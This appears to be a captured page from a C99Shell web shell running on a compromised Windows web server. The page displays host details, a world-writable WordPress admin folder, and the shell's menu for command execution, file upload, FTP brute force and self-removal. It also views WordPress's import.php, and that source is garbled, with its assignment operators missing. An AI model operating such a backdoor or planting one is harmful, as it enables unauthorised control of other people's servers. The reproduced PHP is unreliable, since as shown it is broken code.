!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\jaime\wordpress\wp-admin\   drwxrwxrwx
Free 7.96 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     import.php (1.37 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once ('admin.php');
$title __('Import');
$parent_file 'import.php';
require_once (
'admin-header.php');
?>

<div class="wrap">
<h2><?php _e('Import'); ?></h2>
<p><?php _e('If you have posts or comments in another system WordPress can import them into your current blog. To get started, choose a system to import from below:'); ?></p>

<?php

// Load all importers so that they can register.
$import_loc 'wp-admin/import';
$import_root ABSPATH.$import_loc;
$imports_dir = @ dir($import_root);
if (
$imports_dir) {
    while ((
$file $imports_dir->read()) !== false) {
        if (
preg_match('|^\.+$|'$file))
            continue;
        if (
preg_match('|\.php$|'$file))
            require_once(
"$import_root/$file");
    }
}

$importers get_importers();

if (empty (
$importers)) {
    echo 
'<p>'.__('No importers are available.').'</p>'// TODO: make more helpful
} else {
?>
<table width="100%" cellpadding="3" cellspacing="3">

<?php
    $style 
'';
    foreach (
$importers as $id => $data) {
        
$style = ('class="alternate"' == $style || 'class="alternate active"' == $style) ? '' 'alternate';
        
$action "<a href='admin.php?import=$id' title='{$data[1]}'>{$data[0]}</a>";

        if (
$style != '')
            
$style 'class="'.$style.'"';
        echo 
"
            <tr 
$style>
                <td class=\"togl\">
$action</td>
                <td class=\"desc\">
{$data[1]}</td>
            </tr>"
;
    }
?>

</table>
<?php
}
?>

</div>

<?php

include ('admin-footer.php');
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--